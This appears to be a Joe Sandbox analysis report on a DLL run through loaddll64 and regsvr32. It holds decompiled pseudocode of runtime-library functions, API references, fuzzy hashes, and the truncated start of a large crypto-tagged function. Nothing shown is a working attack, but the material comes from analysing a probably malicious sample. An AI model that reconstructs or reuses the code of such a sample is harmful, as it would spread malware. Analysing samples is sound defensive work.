Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
Instruction ID: 2aa4956cb2eb297d7e65a69c636beaa34fa99894a72eda82d3b55ebaaa463918
Opcode Fuzzy Hash: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
Instruction Fuzzy Hash: 1A91BF73E1877289FB50EB75E4806BD27A1BB06B98F448276DE0E576A4EF38D485C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE61CE0 Relevance: 6.1, APIs: 4, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 47%

			E00007FFA7FFA0AE61CE0(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				long long _v24;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr _t62;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if ((E00007FFA7FFA0AE62250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0xae61d3a;
				E00007FFA7FFA0AE618F0(__rax, _a8);
				_t48 = _a16 - __rax;
				E00007FFA7FFA0AE61DF0(_t48, _a8, _a8, _t48, _a24);
				goto 0xae61de7;
				E00007FFA7FFA0AE62170(_t48, _a8);
				_t62 =  *0xaeda228; // 0xffffffffffffffff
				_t50 = _t62 -  *_t48;
				if (_t50 - _a24 > 0) goto 0xae61d65;
				E00007FFA7FFA0AE62230(_a8);
				E00007FFA7FFA0AE62170(_t50, _a8);
				_t52 =  *_t50 + _a24;
				_v24 = _t52;
				if (_a24 <= 0) goto 0xae61de2;
				r8d = 0;
				if ((E00007FFA7FFA0AE622B0(_t52, _a8, _v24) & 0x000000ff) == 0) goto 0xae61de2;
				E00007FFA7FFA0AE618F0(_t52, _a8);
				_v16 = _t52;
				E00007FFA7FFA0AE62170(_t52, _a8);
				E00007FFA7FFA0AE611E0(_v16 +  *_t52, _a16, _a24);
				return E00007FFA7FFA0AE623A0(_v16 +  *_t52, _a8, _v24);
			}

0x7ffa0ae61ce0
0x7ffa0ae61ce5
0x7ffa0ae61cea
0x7ffa0ae61d07
0x7ffa0ae61d0e
0x7ffa0ae61d1b
0x7ffa0ae61d30
0x7ffa0ae61d35
0x7ffa0ae61d3f
0x7ffa0ae61d47
0x7ffa0ae61d51
0x7ffa0ae61d59
0x7ffa0ae61d60
0x7ffa0ae61d6a
0x7ffa0ae61d72
0x7ffa0ae61d77
0x7ffa0ae61d82
0x7ffa0ae61d84
0x7ffa0ae61d9b
0x7ffa0ae61da2
0x7ffa0ae61da7
0x7ffa0ae61db1
0x7ffa0ae61dce
0x7ffa0ae61deb

APIs

Part of subcall function 00007FFA0AE62250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE6226B
Part of subcall function 00007FFA0AE62250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE6227C

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE61D0E

Part of subcall function 00007FFA0AE618F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE618FE

Part of subcall function 00007FFA0AE61DF0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA0AE61E56
Part of subcall function 00007FFA0AE61DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE61E98
Part of subcall function 00007FFA0AE61DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE61EAC
Part of subcall function 00007FFA0AE61DF0: char_traits.LIBCPMTD ref: 00007FFA0AE61EDB

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA0AE61D60
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE61DA2
char_traits.LIBCPMTD ref: 00007FFA0AE61DCE

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$Mtx_guardMtx_guard::~_char_traits$EmptyQueue::Structured
String ID:
API String ID: 3922470843-0
Opcode ID: 9dc5e077f87c3be6b44e717f9175d65acc51dec95d13604ab53f14413601f7af
Instruction ID: 454d22d4e14c2744f49e573a68d783f2be9ad4f51439828d196aa570f3f3009f
Opcode Fuzzy Hash: 9dc5e077f87c3be6b44e717f9175d65acc51dec95d13604ab53f14413601f7af
Instruction Fuzzy Hash: 8721C033A1CA9581DA10EB66F85116FA370FBC6BC4F508576EB8D87B6ADE3DD5008B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE61DF0 Relevance: 6.1, APIs: 4, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00007FFA7FFA0AE61DF0(intOrPtr* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				long long _v24;
				long long _v32;
				long long _v40;
				void* _t44;
				intOrPtr* _t49;
				intOrPtr* _t51;
				long long _t53;
				intOrPtr* _t54;
				intOrPtr _t61;

				_t49 = __rax;
				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFA7FFA0AE621F0(_t44, __rax, _a16, _a24);
				E00007FFA7FFA0AE62400(_t44, __rax, _a16, _a24, _a32);
				_a32 = _t49;
				E00007FFA7FFA0AE62170(_t49, _a8);
				_t61 =  *0xaeda228; // 0xffffffffffffffff
				_t51 = _t61 -  *_t49;
				if (_t51 - _a32 > 0) goto 0xae61e5b;
				E00007FFA7FFA0AE62230(_a8);
				E00007FFA7FFA0AE62170(_t51, _a8);
				_t53 =  *_t51 + _a32;
				_v40 = _t53;
				if (_a32 <= 0) goto 0xae61eef;
				r8d = 0;
				if ((E00007FFA7FFA0AE622B0(_t53, _a8, _v40) & 0x000000ff) == 0) goto 0xae61eef;
				E00007FFA7FFA0AE618D0(_t53, _a16);
				_t54 = _t53 + _a24;
				_v24 = _t54;
				E00007FFA7FFA0AE618F0(_t54, _a8);
				_v32 = _t54;
				E00007FFA7FFA0AE62170(_t54, _a8);
				E00007FFA7FFA0AE611E0(_v32 +  *_t54, _v24, _a32);
				return E00007FFA7FFA0AE623A0(_v32 +  *_t54, _a8, _v40);
			}

0x7ffa0ae61df0
0x7ffa0ae61df0
0x7ffa0ae61df5
0x7ffa0ae61dfa
0x7ffa0ae61dff
0x7ffa0ae61e12
0x7ffa0ae61e26
0x7ffa0ae61e2b
0x7ffa0ae61e35
0x7ffa0ae61e3d
0x7ffa0ae61e47
0x7ffa0ae61e4f
0x7ffa0ae61e56
0x7ffa0ae61e60
0x7ffa0ae61e68
0x7ffa0ae61e6d
0x7ffa0ae61e78
0x7ffa0ae61e7a
0x7ffa0ae61e91
0x7ffa0ae61e98
0x7ffa0ae61e9d
0x7ffa0ae61ea2
0x7ffa0ae61eac
0x7ffa0ae61eb1
0x7ffa0ae61ebb
0x7ffa0ae61edb
0x7ffa0ae61ef8

APIs

Part of subcall function 00007FFA0AE621F0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA0AE62217

Part of subcall function 00007FFA0AE62170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE6217E

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFA0AE61E56
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE61E98
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE61EAC
char_traits.LIBCPMTD ref: 00007FFA0AE61EDB

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityMtx_guardMtx_guard::~_Queue$EmptyQueue::Structuredchar_traits
String ID:
API String ID: 3679362534-0
Opcode ID: be7b329d797fb93d546e8614ca837f2ae52d3ad5271fd09d0c871be752f4c66c
Instruction ID: b018cfa13724e8403aa0d6b3f0525dbc92218e4b7900b6e90e50aed15797ff53
Opcode Fuzzy Hash: be7b329d797fb93d546e8614ca837f2ae52d3ad5271fd09d0c871be752f4c66c
Instruction Fuzzy Hash: B321F833A1CB9581DA10EB66F49116EA760FBC5BD0F008572EB8D87B6ADE7CD4508B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE71004 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00007FFA7FFA0AE71004(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
				intOrPtr _v0;
				signed long long _v8;
				void* __rdi;
				void* __rsi;
				signed int _t41;
				signed long long _t62;
				short* _t67;
				signed int* _t68;
				intOrPtr* _t74;
				intOrPtr* _t76;
				void* _t84;
				void* _t88;
				signed short* _t89;
				void* _t91;
				void* _t94;
				signed short* _t97;
				void* _t99;
				void* _t101;
				void* _t103;
				void* _t106;
				void* _t107;

				_t97 = __r8;
				_t76 = __rcx;
				_a8 = __rbx;
				_a24 = __rbp;
				E00007FFA7FFA0AE72DE0(__edx, __rax, __rbx, __rcx, _t84, _t88, _t91, __r8, _t99, _t101, _t103);
				_t62 =  *0xaede008; // 0xa3acf2c2a32b
				_a5176 = _t62 ^ _t94 - __rax;
				_t74 = _t76;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t107 = _t106 + _t97;
				_t89 = _t97;
				 *_t74 =  *((intOrPtr*)(0xaedf940 + (__edx >> 6) * 8));
				 *((intOrPtr*)(_t74 + 8)) = 0;
				if (_t97 - _t107 >= 0) goto 0xae71145;
				_t67 =  &_a40;
				if (_t89 - _t107 >= 0) goto 0xae710ae;
				_t41 =  *_t89 & 0x0000ffff;
				if (_t41 != 0xa) goto 0xae7109a;
				 *_t67 = 0xd;
				_t68 = _t67 + 2;
				 *_t68 = _t41;
				if ( &(_t68[0]) -  &_a1744 < 0) goto 0xae7107c;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_v8 =  &_a1752;
				r9d = 0;
				E00007FFA7FFA0AE6D698();
				if (0 == 0) goto 0xae7113d;
				if (0 == 0) goto 0xae7112d;
				_v8 = _v8 & 0x00000000;
				r8d = 0;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0xae7113d;
				if (0 + _a24 < 0) goto 0xae710fa;
				 *((intOrPtr*)(_t74 + 4)) = __edi - r15d;
				goto 0xae71071;
				 *_t74 = GetLastError();
				return E00007FFA7FFA0AE63A70(_t39, 0, 0, _a5176 ^ _t94 - __rax);
			}

0x7ffa0ae71004
0x7ffa0ae71004
0x7ffa0ae71004
0x7ffa0ae71009
0x7ffa0ae7101b
0x7ffa0ae71023
0x7ffa0ae7102d
0x7ffa0ae71038
0x7ffa0ae7103e
0x7ffa0ae7104c
0x7ffa0ae71050
0x7ffa0ae71056
0x7ffa0ae71068
0x7ffa0ae7106e
0x7ffa0ae71071
0x7ffa0ae71077
0x7ffa0ae7107f
0x7ffa0ae71081
0x7ffa0ae7108c
0x7ffa0ae71093
0x7ffa0ae71096
0x7ffa0ae7109a
0x7ffa0ae710ac
0x7ffa0ae710ae
0x7ffa0ae710b9
0x7ffa0ae710c7
0x7ffa0ae710da
0x7ffa0ae710df
0x7ffa0ae710e9
0x7ffa0ae710f2
0x7ffa0ae710f8
0x7ffa0ae710fa
0x7ffa0ae7110f
0x7ffa0ae71118
0x7ffa0ae71123
0x7ffa0ae7112b
0x7ffa0ae71132
0x7ffa0ae71138
0x7ffa0ae71143
0x7ffa0ae71173

APIs

WriteFile.KERNEL32 ref: 00007FFA0AE7111B
GetLastError.KERNEL32 ref: 00007FFA0AE7113D

Strings

U, xrefs: 00007FFA0AE710C7

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
Instruction ID: 496be4169bae5c83d3ce570ce30bf7b4799ed534f2359059ec16b72c446e4a2d
Opcode Fuzzy Hash: f98079f3c4aa1eb608d226a3e204fe1cd29820aa8a2509467dcded0e9b762ee9
Instruction Fuzzy Hash: 3E418123A18B9185DB209F25F4943BA67A0FB99B94F848131EE4D87798EF3CD441C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE72EB4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FFA7FFA0AE72EB4(intOrPtr* __rcx) {
				void* __rbx;
				void* _t3;
				void* _t7;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t13;

				_t3 = E00007FFA7FFA0AE66B4C(_t7, __rcx, __rcx, _t10, _t11, _t12, _t13);
				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0xae72ed5;
				if ( *__rcx != 0xe06d7363) goto 0xae72ed5;
				if (_t3 == 1) goto 0xae72edb;
				return _t3;
			}

0x7ffa0ae72ebd
0x7ffa0ae72ec6
0x7ffa0ae72ece
0x7ffa0ae72ed3
0x7ffa0ae72eda

APIs

__C_specific_handler.LIBVCRUNTIME ref: 00007FFA0AE72EBD

Part of subcall function 00007FFA0AE66B4C: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFA0AE66C0C
Part of subcall function 00007FFA0AE66B4C: RtlUnwindEx.KERNEL32 ref: 00007FFA0AE66C5B

Strings

csm, xrefs: 00007FFA0AE72EC8
f, xrefs: 00007FFA0AE72EC2

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: C_specific_handlerCurrentImageNonwritableUnwind
String ID: csm$f
API String ID: 1396615161-629598281
Opcode ID: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
Instruction ID: 13eafb7d1be8673f02c017ecfefad48c481eb6816eeb0157fd4063b1f454d825
Opcode Fuzzy Hash: 8a5be923c7cc1b99aa4a0096ba3a69dd8979e15323e2be363a2fe093e1ce8b04
Instruction Fuzzy Hash: 05D05E63C0815686FB3A3771B0852BC05988F1E764F58D8B0CA6C052877E1D98D04601

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE73ED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

LoadCursorW.USER32 ref: 00007FFA0AE73F22
RegisterClassExW.USER32 ref: 00007FFA0AE73F59

Strings

P, xrefs: 00007FFA0AE73ED9

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: ClassCursorLoadRegister
String ID: P
API String ID: 1693014935-3110715001
Opcode ID: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
Instruction ID: efa39de0469584e658b6b99616b1778a27e6633d41b9ce8097d7160ff525c0f1
Opcode Fuzzy Hash: 29bdbaf3f29e2b1f60e2da6c671781d039cfe66c367808efb662ff8ab2e4e8d5
Instruction Fuzzy Hash: 3101B232519B8186E760DF10F89831BB7B4F789748F604129E6CD86BA8EFBDD158CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6472C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FFA7FFA0AE6472C(void* __eflags, void* __rax) {
				char _v40;
				void* _t6;
				void* _t11;
				void* _t12;
				char* _t14;
				void* _t16;

				E00007FFA7FFA0AE645C0(__rax,  &_v40);
				_t14 =  &_v40;
				_t6 = E00007FFA7FFA0AE66E00(_t12, _t14, 0xaedcbd8, _t16);
				asm("int3");
				_t11 =  !=  ?  *((void*)(_t14 + 8)) : "Unknown exception";
				return _t6;
			}

0x7ffa0ae64735
0x7ffa0ae64741
0x7ffa0ae64746
0x7ffa0ae6474b
0x7ffa0ae64758
0x7ffa0ae6475d

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFA0AE64735
_CxxThrowException.LIBVCRUNTIME ref: 00007FFA0AE64746

Part of subcall function 00007FFA0AE66E00: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFA0AE6472B), ref: 00007FFA0AE66E7D
Part of subcall function 00007FFA0AE66E00: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFA0AE6472B), ref: 00007FFA0AE66EBC

Strings

Unknown exception, xrefs: 00007FFA0AE64751

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
String ID: Unknown exception
API String ID: 3561508498-410509341
Opcode ID: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
Instruction ID: cde5bd40118be019f07a144e98529c7a44922b9d3cf026b8397d2034d8eb4220
Opcode Fuzzy Hash: 245809459ad59a2729b59716ed244728fe2af4985c2eaed7b011566377c0e5b0
Instruction Fuzzy Hash: ABD05B2361495591DE10FB20F44039C6330FB8274CF90C972D14D415B1FF2CD646C340

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 4768, Parent PID: 4360COMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	2.3%
Signature Coverage:	0%
Total number of Nodes:	899
Total number of Limit Nodes:	7

Executed Functions

Function 00007FFA0AE73FB0 Relevance: 2283.0, APIs: 11, Strings: 1292, Instructions: 2747
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E00007FFA7FFA0AE73FB0(intOrPtr __edx, void* __edi, void* __esp, void* __rbx, long long __rcx, void* __rdx, void* __rdi, void* __rsi, long long __r8, long long _a8, intOrPtr _a16, long long _a24) {
				signed int _v24;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				char _v79;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				char _v88;
				char _v89;
				char _v90;
				char _v91;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v101;
				char _v102;
				char _v103;
				char _v104;
				char _v105;
				char _v106;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				char _v113;
				char _v114;
				char _v115;
				char _v116;
				char _v117;
				char _v118;
				char _v119;
				char _v120;
				char _v121;
				char _v122;
				char _v123;
				char _v124;
				char _v125;
				char _v126;
				char _v127;
				char _v128;
				char _v129;
				char _v130;
				char _v131;
				char _v132;
				char _v133;
				char _v134;
				char _v135;
				char _v136;
				char _v137;
				char _v138;
				char _v139;
				char _v140;
				char _v141;
				char _v142;
				char _v143;
				char _v144;
				char _v145;
				char _v146;
				char _v147;
				char _v148;
				char _v149;
				char _v150;
				char _v151;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				char _v160;
				char _v161;
				char _v162;
				char _v163;
				char _v164;
				char _v165;
				char _v166;
				char _v167;
				char _v168;
				char _v169;
				char _v170;
				char _v171;
				char _v172;
				char _v173;
				char _v174;
				char _v175;
				char _v176;
				char _v177;
				char _v178;
				char _v179;
				char _v180;
				char _v181;
				char _v182;
				char _v183;
				char _v184;
				char _v185;
				char _v186;
				char _v187;
				char _v188;
				char _v189;
				char _v190;
				char _v191;
				char _v192;
				char _v193;
				char _v194;
				char _v195;
				char _v196;
				char _v197;
				char _v198;
				char _v199;
				char _v200;
				char _v201;
				char _v202;
				char _v203;
				char _v204;
				char _v205;
				char _v206;
				char _v207;
				char _v208;
				char _v209;
				char _v210;
				char _v211;
				char _v212;
				char _v213;
				char _v214;
				char _v215;
				char _v216;
				char _v217;
				char _v218;
				char _v219;
				char _v220;
				char _v221;
				char _v222;
				char _v223;
				char _v224;
				char _v225;
				char _v226;
				char _v227;
				char _v228;
				char _v229;
				char _v230;
				char _v231;
				char _v232;
				char _v233;
				char _v234;
				char _v235;
				char _v236;
				char _v237;
				char _v238;
				char _v239;
				char _v240;
				char _v241;
				char _v242;
				char _v243;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				char _v254;
				char _v255;
				char _v256;
				char _v257;
				char _v258;
				char _v259;
				char _v260;
				char _v261;
				char _v262;
				char _v263;
				char _v264;
				char _v265;
				char _v266;
				char _v267;
				char _v268;
				char _v269;
				char _v270;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				char _v275;
				char _v276;
				char _v277;
				char _v278;
				char _v279;
				char _v280;
				char _v281;
				char _v282;
				char _v283;
				char _v284;
				char _v285;
				char _v286;
				char _v287;
				char _v288;
				char _v289;
				char _v290;
				char _v291;
				char _v292;
				char _v293;
				char _v294;
				char _v295;
				char _v296;
				char _v297;
				char _v298;
				char _v299;
				char _v300;
				char _v301;
				char _v302;
				char _v303;
				char _v304;
				char _v305;
				char _v306;
				char _v307;
				char _v308;
				char _v309;
				char _v310;
				char _v311;
				char _v312;
				char _v313;
				char _v314;
				char _v315;
				char _v316;
				char _v317;
				char _v318;
				char _v319;
				char _v320;
				char _v321;
				char _v322;
				char _v323;
				char _v324;
				char _v325;
				char _v326;
				char _v327;
				char _v328;
				char _v329;
				char _v330;
				char _v331;
				char _v332;
				char _v333;
				char _v334;
				char _v335;
				char _v336;
				char _v337;
				char _v338;
				char _v339;
				char _v340;
				char _v341;
				char _v342;
				char _v343;
				char _v344;
				char _v345;
				char _v346;
				char _v347;
				char _v348;
				char _v349;
				char _v350;
				char _v351;
				char _v352;
				char _v353;
				char _v354;
				char _v355;
				char _v356;
				char _v357;
				char _v358;
				char _v359;
				char _v360;
				char _v361;
				char _v362;
				char _v363;
				char _v364;
				char _v365;
				char _v366;
				char _v367;
				char _v368;
				char _v369;
				char _v370;
				char _v371;
				char _v372;
				char _v373;
				char _v374;
				char _v375;
				char _v376;
				char _v377;
				char _v378;
				char _v379;
				char _v380;
				char _v381;
				char _v382;
				char _v383;
				char _v384;
				char _v385;
				char _v386;
				char _v387;
				char _v388;
				char _v389;
				char _v390;
				char _v391;
				char _v392;
				char _v393;
				char _v394;
				char _v395;
				char _v396;
				char _v397;
				char _v398;
				char _v399;
				char _v400;
				char _v401;
				char _v402;
				char _v403;
				char _v404;
				char _v405;
				char _v406;
				char _v407;
				char _v408;
				char _v409;
				char _v410;
				char _v411;
				char _v412;
				char _v413;
				char _v414;
				char _v415;
				char _v416;
				char _v417;
				char _v418;
				char _v419;
				char _v420;
				char _v421;
				char _v422;
				char _v423;
				char _v424;
				char _v425;
				char _v426;
				char _v427;
				char _v428;
				char _v429;
				char _v430;
				char _v431;
				char _v432;
				char _v433;
				char _v434;
				char _v435;
